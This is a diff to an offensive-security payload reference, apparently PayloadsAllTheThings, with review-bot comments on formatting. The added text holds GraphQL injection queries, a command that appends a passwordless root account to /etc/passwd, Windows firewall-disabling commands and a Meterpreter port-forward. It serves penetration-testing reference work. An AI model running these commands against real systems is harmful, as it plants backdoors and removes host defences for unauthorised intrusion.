diff --git a/GraphQL Injection/Images/htb-help.png b/GraphQL Injection/Images/htb-help.png new file mode 100644 index 0000000..5b0493b Binary files /dev/null and b/GraphQL Injection/Images/htb-help.png differ diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index f7b0a75..cfc73ff 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -4,10 +4,10 @@ ## Exploit -Identify an injection point +### Identify an injection point -```javascript -?param={__schema{types{name}}} +```js +example.com/graphql?query={__schema{types{name}}} ``` Check if errors are visible @@ -17,7 +17,15 @@ Check if errors are visible ?param={thisdefinitelydoesnotexist} ``` -Enumerate Database Schema with the following GraphQL query +### Extract data + +```js +example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}} +``` + +![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true) + +### Enumerate Database Schema with the following GraphQL query ```javascript fragment FullType on __Type { @@ -114,10 +122,9 @@ query IntrospectionQuery { } } } - ``` -Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type +### Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type ```javascript {__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}} @@ -127,4 +134,4 @@ Enumerate the definition of interesting types using the following GraphQL query, * [Introduction to GraphQL](https://graphql.org/learn/) * [GraphQL Introspection](https://graphql.org/learn/introspection/) - +* [API Hacking GraphQL - @ghostlulz - jun 8, 2019](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2) 
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index bcf6af3..dfae6bd 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -384,6 +384,14 @@ E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` You can now use the `su` command with `hacker:hacker` +Alternatively you can use the following lines to add a dummy user without a password. +WARNING: you might degrade the current security of the machine. + +```powershell +echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd +su - dummy +``` + ## NFS Root Squashing @@ -526,6 +534,8 @@ lxc start mycontainer lxc exec mycontainer /bin/sh ``` +Alternatively https://github.com/initstring/lxd_root + ## References - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 227d80a..a9d182f 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -85,6 +85,7 @@ optional arguments: ```c portfwd list +portfwd add -l 88 -p 88 -r 127.0.0.1 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 or diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 3975ad9..45e88b8 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md 
@@ -172,6 +172,13 @@ List firewall's blocked ports $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports ``` +Disable firewall + +```powershell +netsh firewall set opmode disable +netsh advfirewall set allprofiles state off +``` + List all network shares ```powershell diff --git a/SAML Injection/README.md b/SAML Injection/README.md index 928b56e..e244bfd 100644 --- a/SAML Injection/README.md +++ b/SAML Injection/README.md @@ -161,7 +161,7 @@ The SAML response is accepted by the service provider. Due to the vulnerability, An XSLT can be carried out by using the `transform` element. -![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg) +![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg) Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_Attack) ```xml
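Review bot: In the `GraphQL Injection/README.md` hunk at `@@ -4,10 +4,10 @@`, the fence tag changes from `javascript` to `js` while every other block in the file keeps `javascript`, and the next snippet ("Check if errors are visible") still uses the old `?param={...}` form next to the new `example.com/graphql?query={...}` form. Pick one fence tag and one URL placeholder and apply both across the file so the three request examples read as the same endpoint.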
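Review bot: In the `@@ -17,7 +17,15 @@` hunk of the same file, the new image is referenced through an absolute `raw=true` URL on the upstream `master` branch, which breaks in forks and on a branch rename; use the relative path `Images/htb-help.png`, the file this patch adds. Also, `### Enumerate Database Schema with the following GraphQL query` is an instruction sentence promoted to a heading; a short heading (`### Enumerate the schema`) with the sentence kept as prose matches the `### Extract data` heading introduced just above it.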
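Review bot: Same heading issue in `@@ -114,10 +122,9 @@`: `### Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type` should become a short heading, with the `replacing "User" with the chosen type` instruction kept as the line before the `{__type (name: "User") ...}` block. Dropping the stray blank line before the closing fence is fine.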
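Review bot: The reference added in `@@ -127,4 +134,4 @@` writes the date as `jun 8, 2019`, while the other References sections touched by this patch use the `Dec 7, 2017` form; capitalise the month. Since the trailing blank line was removed, also confirm the file still ends with a newline.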
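Review bot: In `Methodology and Resources/Linux - Privilege Escalation.md` at `@@ -384,6 +384,14 @@`, the block is fenced as `powershell` although `echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd` and `su - dummy` are Linux shell commands; tag it `bash` like the neighbouring `su` example. The WARNING should also be concrete: the line appends a UID 0 account with an empty password field, i.e. a passwordless root-equivalent login that persists after the session, so the note should tell the reader to delete the `dummy` line from `/etc/passwd` as soon as it is no longer needed (the `hacker` entry above it needs the same cleanup).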
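Review bot: `Alternatively https://github.com/initstring/lxd_root` in `@@ -526,6 +534,8 @@` is a bare URL dropped between the `lxc exec` snippet and the `## References` heading. Say in one line that it automates the LXD steps shown above, and add it to the References list in the file's `[title - author - date](url)` format instead of leaving a naked link in the body.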
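Review bot: The new `portfwd add -l 88 -p 88 -r 127.0.0.1` in `Network Pivoting Techniques.md` at `@@ -85,6 +85,7 @@` has no explanation of what it is for or how it differs from the `-L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445` line below it (no bind address, remote host set to loopback); add a one-line comment in the block so the two forms are distinguishable. The block is also fenced as `c` although these are Meterpreter console commands.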
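Review bot: In `Windows - Privilege Escalation.md` at `@@ -172,6 +172,13 @@`, the two lines under `Disable firewall` are not interchangeable: `netsh firewall` is the deprecated pre-Vista context and `netsh advfirewall` is its replacement on current Windows versions, so note which applies where rather than presenting them as one block. Both change host state and need an elevated prompt, unlike the read-only `List ...` snippets around them; that should be stated.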
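Review bot: In `SAML Injection/README.md` at `@@ -161,7 +161,7 @@`, the credit `Picture from [http://sso-attacks.org/XSLT_Attack](...)` is appended to the image line, and the alt text is still the raw image URL. Put the credit on its own line after the image and give the image a descriptive alt text (for example `XSLT transform element inside a SAML signature`) so both render sensibly as a caption.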